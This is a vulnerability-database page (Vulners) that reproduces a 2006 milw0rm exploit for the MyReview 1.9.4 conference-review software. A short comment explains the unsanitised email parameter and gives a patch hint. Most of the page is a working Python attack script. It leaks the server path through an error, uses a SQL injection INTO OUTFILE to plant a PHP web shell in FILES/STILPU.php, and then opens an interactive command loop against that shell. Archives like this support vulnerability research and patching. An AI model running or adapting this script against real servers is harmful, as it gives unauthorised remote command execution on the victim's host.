Vulners
Lucene search
MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit
# MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............
# function GetMember ($email, $db, $mode="array")
# {
# $query = "SELECT * FROM PCMember WHERE email = '$email'" ;
# result = $db->execRequete ($query);
# ..........
#
# $email is not checked before used into $query
#
# for patch
#
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#
import httplib, urllib, re, urlparse, sys
def usage():
print """
MyReview 1.9.4 SQL Injection exploit
Usage: python exploit.py http://target/pathtomyreview/
Requires warnings to be displayed so we cat get the localpath and FILES/ to be writable
by STILPU (dmooray[a lu']gmail.com)
"""
sys.exit(1)
def getlocalpath(server):
params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
con = httplib.HTTPConnection(server)
con.request("POST",path+"Admin.php",params,headers)
resp=con.getresponse()
data=resp.read()
try:
localpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)
except Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)
return localpath
def sendshell(server):
shell="'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
sql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"
headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
con = httplib.HTTPConnection(server)
con.request("POST",path+"Admin.php",params,headers)
def sendcmd(server):
while 1:
try:
cmd=raw_input('sh$ ')
cmd=cmd.replace(" ","+")
con = httplib.HTTPConnection(target)
con.request("GET",path+"FILES/STILPU.php?cmd="+cmd)
resp=con.getresponse()
data=resp.read()
if (cmd=="exit" or cmd=="quit"): break
print data
except KeyboardInterrupt: break
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
else:
url = sys.argv[1]
url = urlparse.urlsplit(url)
target = url[1]
path = url[2]
sendshell(target)
sendcmd(target)
# milw0rm.com [2006-09-19]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Sep 2006 00:00Current
7.1High risk
Vulners AI Score7.1